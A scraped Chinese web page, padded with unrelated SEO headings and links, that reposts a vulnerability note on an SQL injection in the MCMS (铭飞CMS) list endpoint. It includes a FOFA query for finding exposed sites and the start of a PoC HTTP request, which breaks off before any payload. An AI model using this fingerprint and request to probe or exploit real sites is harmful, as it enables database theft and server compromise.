当前位置: 首页 > news >正文

恩施做网站的公司潍坊市安丘网站建设

恩施做网站的公司,潍坊市安丘网站建设,WordPress用rds云数据库,公共设施建设投资公司网站0x01 产品简介 铭飞CMS是一款基于java开发的一套轻量级开源内容管理系统,铭飞CMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案 0x02 漏洞概述 铭飞CMS在5.2.10版本以前list 接口处存在sql注入…

0x01 产品简介

铭飞CMS是一款基于java开发的一套轻量级开源内容管理系统,铭飞CMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案

0x02 漏洞概述

铭飞CMS在5.2.10版本以前list 接口处存在sql注入漏洞,能够利用该漏洞获取敏感信息,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:

body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"

0x04 漏洞复现 

PoC

POST /cms/category/list HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: clos
http://www.yayakq.cn/news/242372/

相关文章:

  • 创建网站有免费的吗中小学建设网站
  • 门户网站 建设提供网站建设方案ppt
  • 企业自建网站平台有哪些ps美工教程自学网
  • 电子商务网站建设素材wordpress数据库登陆
  • 建设网站群的意义论坛搭建一键
  • 做网站要好多钱做网站如何推广
  • 顺平网站建设响应式网站开发教程pdf
  • 开发商城网站建设订单网站怎么做
  • 备案网站系统弹簧机 东莞网站建设
  • 禹州做网站的网站后台是做什么的
  • 网站建设飠金手指下拉活动网页怎么做
  • 深圳宝安网站建设公司注册公司有哪些风险
  • 电脑商城网站源码开发网站现实网络传输失败
  • 拉新奖励的app排行陇南地网站seo
  • 网站开发远程服务器如何设置网站服务器的选择
  • 网站开发技术基础教程北京seo顾问服务公司
  • 网站建设需要哪个部门审批成都网站建设桔子
  • 图库网站模板天津装修公司排名
  • 南京网站南京网站开发网站内链 外链
  • 郑州东区网站建设整合营销的特点
  • 上海营销型网站报价网站的描述
  • 找做网站的个人微信网站开发平台
  • 精品课程网站开发项目付费阅读下载网站开发
  • 海口招商建设有限公司网站西安十大平面广告设计公司
  • 惠州网站建设外包住建厅报名考试入口
  • 网站设计目前和将来的就业前景网站图标 psd
  • 学畅留学招聘网站开发主管制作app的流程
  • wordpress全景图片优化推广网站推荐
  • 网站企业型类如何制作收费网页
  • 点卡平台网站开发seo网站项目讲解